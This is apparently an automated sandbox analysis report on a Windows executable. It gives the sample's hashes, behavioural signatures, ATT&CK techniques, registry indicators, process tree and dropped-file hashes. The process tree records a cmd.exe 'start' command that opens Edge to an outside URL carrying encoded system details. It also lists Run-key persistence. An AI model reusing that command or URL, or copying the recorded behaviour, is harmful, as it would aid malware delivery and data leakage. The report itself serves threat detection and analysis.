e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674

Analysis

max time kernel
151s
max time network
173s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2022, 15:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe
Size

143KB
MD5

d35a36162eefccbd55c913eb6551dee6
SHA1

fbdd7ee99f426911d0d85799ad6ffd8274ae7f32
SHA256

e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674
SHA512

265751e975d03cbcd5c0e14ac96f74372e8c7c20179e7a5b206b4f4ef144018409aa43780d2767d446fb5f50c252599dcf1b4d9cc96eb13fa20ffa3d4317f4ef
SSDEEP

3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DRf:pe9IB83ID5lf

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e6625020-2efd-4996-94c9-3e719c1eba73.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221128142435.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2912	msedge.exe
2912	msedge.exe
4552	msedge.exe
4552	msedge.exe
4552	msedge.exe
1376	identity_helper.exe
1376	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4552	msedge.exe
4552	msedge.exe
4552	msedge.exe
4552	msedge.exe
4552	msedge.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3668	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe
4552	msedge.exe
4552	msedge.exe
4552	msedge.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3668	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3668 wrote to memory of 4932	3668	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe	79
PID 3668 wrote to memory of 4932	3668	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe	79
PID 3668 wrote to memory of 4932	3668	e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe	79
PID 4932 wrote to memory of 4552	4932	cmd.exe	81
PID 4932 wrote to memory of 4552	4932	cmd.exe	81
PID 4552 wrote to memory of 3500	4552	msedge.exe	83
PID 4552 wrote to memory of 3500	4552	msedge.exe	83
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 4284	4552	msedge.exe	86
PID 4552 wrote to memory of 2912	4552	msedge.exe	87
PID 4552 wrote to memory of 2912	4552	msedge.exe	87
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89
PID 4552 wrote to memory of 1572	4552	msedge.exe	89

C:\Users\Admin\AppData\Local\Temp\e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe
"C:\Users\Admin\AppData\Local\Temp\e0393b9fa28637be2c01291f43bd142de046ebed985c4ec6d94c35aee243d674.exe"
1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5300108^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt31^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5300108&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt31|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p1
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb93e646f8,0x7ffb93e64708,0x7ffb93e64718
      4⤵
      PID:3500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
      4⤵
      PID:4284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2912
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
      4⤵
      PID:1572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
      4⤵
      PID:4228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
      4⤵
      PID:4588
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4888 /prefetch:8
      4⤵
      PID:4984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
      4⤵
      PID:2392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5764 /prefetch:8
      4⤵
      PID:4624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
      4⤵
      PID:940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
      4⤵
      PID:3488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
      4⤵
      PID:4184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:3428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7b6b35460,0x7ff7b6b35470,0x7ff7b6b35480
        5⤵
        
        PID:4828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1468,623982481745295671,1080997855728847374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
7ef66f502cb164d6d88fd779895d5e07

SHA1
75c68e887afe0041c18bc01dc36ae719db07a436

SHA256
084f8949af79ac48c5c245e4bbeea807949d1e8e182e7d0487227231fcd97a77

SHA512
419b6e5def7e1051af856ea4256235fa4f1bdbf001b54f1db9e59c44f7da8f9cfa8d63f77e35345ec6d5c3ab13de10094281d44f42a7e1fd9d92b3b68ac5ba9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
472B

MD5
03ad9fc0b00b5df3165dc2fb1e3b0a3e

SHA1
f8243335a8bc24d989bddd346048a055e1d0bdeb

SHA256
366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec

SHA512
a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
f569e1d183b84e8078dc456192127536

SHA1
30c537463eed902925300dd07a87d820a713753f

SHA256
287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413

SHA512
49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
3c494a1196df0e7d6eb8fd2eb05e4bd3

SHA1
4d3c3f3d89486f964cfa451668ca456e3d1a3796

SHA256
de2fbebc98a8cac90ff5a7291f4c1fb786cde09dea47ee884e8b98e2123ecc6e

SHA512
a487ecb6393b4d1f5bc0a0fd54d687f5d272ce791e73b04bf9ab50e79f9ef7bc89298ec45534e0da4c32b5d987d6709866d5506e5b68433e22fd6fb2f688dcd4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
402B

MD5
bcc6156106003ae085a90d0039cdf4a7

SHA1
ed713f79685d22b29a77247c568439c226838c0f

SHA256
db7f63ddaf244b20bc8665936be6400ea529ead1490c8f4b7ab8b1e0c20ed672

SHA512
c4dbdda9aaaea6b42b895fa83a147353bdfb86777593491f150d49ca01666ed6e497fb7ed97c2ca31c1861f36185d3dfb26bdfd663dc54bb45c35ce1d6f90fb2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
0a67de09c3d7b52f962fba7e01461758

SHA1
ada91517446664fcaf4dd26bf95f7542012ec29d

SHA256
0f3f5c191cee92f253ade1a072b29ba3f640de2f15794b5feba0ec86e8015124

SHA512
868844f23ed64f420142517cb488dd5a22396bfc1a681c2bf7881c10b5657a2fb3fb71b4a40cb2c1ea51af04aa34f50e75cee79dcff92cb20048e0c0c113bbc9

Download Submit